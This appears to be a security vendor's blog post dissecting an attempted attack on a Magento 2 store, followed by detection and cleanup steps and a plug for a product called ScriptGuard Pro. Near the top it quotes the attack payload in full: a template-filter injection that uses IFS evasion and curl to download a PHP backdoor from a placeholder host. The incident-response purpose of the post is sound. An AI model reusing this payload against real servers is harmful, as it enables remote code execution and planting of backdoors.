Script Explanation
We'll investigate the script below which is taken
from an attempted attack on a Magento 2 website. The script in question attempts to inject and execute dangerous commands on your Magento server, potentially compromising your entire system. Here’s a breakdown of what it does:
{{var this.getTemplateFilter().filter(order)}} {{var this.getTemplateFilter().addAfterFilterCallback(system).
Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://x.x.x.x/cache.php?m=8089-28808-12394)}}
Breakdown of the Script
- {{var this.getTemplateFilter().filter(order)}}: This portion of the code appears to be a benign call to a template filter function that processes order data. However, it's used here as a disguise to make the code look less suspicious.
{{var this.getTemplateFilter().addAfterFilterCallback(system)}}: This adds a callback function, likely intended to execute system-level commands. It's the beginning of a malicious command injection.
cd${IFS%??}pub: The command changes the working directory to thepub
directory of your Magento installation. The${IFS%??}
part is a technique used to bypass some basic security measures by exploiting the Internal Field Separator (IFS) in shell commands.
curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://x.x.x.x/cache.php?m=8089-28808-12394: This is the critical part of the script. It uses thecurl
command to download a file from an external server (replacingx.x.x.x
with the actual IP address or domain) and saves it ascache.php
in thepub
directory. The downloaded file is likely a malicious PHP script that can be executed later.
This script essentially injects a backdoor into your Magento installation by placing a potentially malicious PHP file in a publicly accessible directory. Once in place, the attacker can execute this script to compromise your site further.
How to Check if the Script was Successful
To determine if the malicious script was successfully executed on your Magento server, follow these detailed steps:
1. Check for the Presence of Malicious Files
Navigate to the pub
directory of your Magento installation and look for a file named cache.php
or any other unfamiliar PHP files. You can use the following command in the terminal:
cd /path/to/magento/pub
ls -l
If you find the cache.php
file or any suspicious files, this is a strong indicator that the script was successful.
2. Check the Last Modified Date and Time of Files
Reviewing the last modified dates of files, especially in the pub
directory, can help you identify when a file was added or changed. This can indicate whether a file was part of the attack. Use the following command to check the last modified date and time of all files in the pub
directory:
cd /path/to/magento/pub
ls -lt
This command will list all files in the directory, sorted by modification time, with the most recently modified files at the top. Look for any files that were modified at unusual times, especially if they align with when you suspect the attack occurred.
You can also check a specific file’s last modified time using:
stat cache.php
This command will show detailed information about the file, including the last modification time.
3. Review Server Logs
Examine your web server logs for any signs of unauthorized access or unusual activity, especially around the time you suspect the script might have been executed. Check both access logs and error logs:
tail -n 1000 /var/log/apache2/access.log
tail -n 1000 /var/log/apache2/error.log
Look for entries that involve the curl
command or requests to the suspicious URL (e.g., http://x.x.x.x/cache.php?m=8089-28808-12394
).
4. Inspect the Magento Database
The script might have been used to inject malicious content into your Magento database. Check your database for any unfamiliar entries, especially in the following tables:
core_config_data
admin_user
customer_entity
To query your database, you can use the following MySQL command:
mysql -u username -p
USE magento_db;
SELECT * FROM core_config_data WHERE path LIKE '%cache.php%';
Replace username
with your MySQL username and magento_db
with your Magento database name. If you find any suspicious data, it could mean the script successfully manipulated your database.
5. Monitor for Unusual Network Activity
Check your server's network activity to see if there have been any unexpected outbound connections. This can indicate that a malicious script is communicating with an external server:
netstat -an | grep ESTABLISHED
Look for any connections to unfamiliar IP addresses or domains, particularly those matching the URL in the script.
What to Do If the Script was Successful
If you find evidence that the script was successful, follow these steps to secure your Magento store:
1. Isolate the Affected Server
Immediately disconnect the affected server from the network to prevent further damage or data leakage. This will help contain the threat.
2. Remove Malicious Files
Manually delete any malicious files you identified, such as cache.php
in the pub
directory:
rm /path/to/magento/pub/cache.php
Also, check other directories for any suspicious files and remove them.
3. Restore from Backup
If possible, restore your Magento store from a clean backup made before the attack occurred. This is the safest way to ensure all traces of the malicious script are removed.
4. Change All Credentials
Change all passwords for your Magento admin, database, FTP, and any other accounts associated with the affected server. If the attacker accessed your system, they could have compromised these credentials.
5. Patch and Update
Ensure your Magento installation, as well as any extensions, are fully updated to the latest versions to patch known vulnerabilities. This reduces the risk of similar attacks in the future.
6. Implement Security Measures
Enhance your Magento store's security by installing a Web Application Firewall (WAF), enabling Two-Factor Authentication (2FA), and using security-focused extensions like ScriptGuard Pro.
7. Scan for Malware
Run a thorough malware scan on your server to detect any other potential threats. Use tools like ClamAV
or a dedicated Magento security scanner.
8. Monitor for Recurrence
After taking these steps, closely monitor your server and Magento store for any signs of recurring attacks or suspicious activity. This ongoing vigilance is crucial in the aftermath of an attack.
How ScriptGuard Pro Blocks This Attack
ScriptGuard Pro can prevent such attacks by blocking the injection of malicious scripts into your Magento store. It does this by filtering out dangerous characters and commands before they can be executed, ensuring your store is protected from unauthorized code execution.
To find out more details on how to protect your Magento store using ScriptGuard Pro, please visit https://www.lecsoft.co.uk/scriptguardpro.html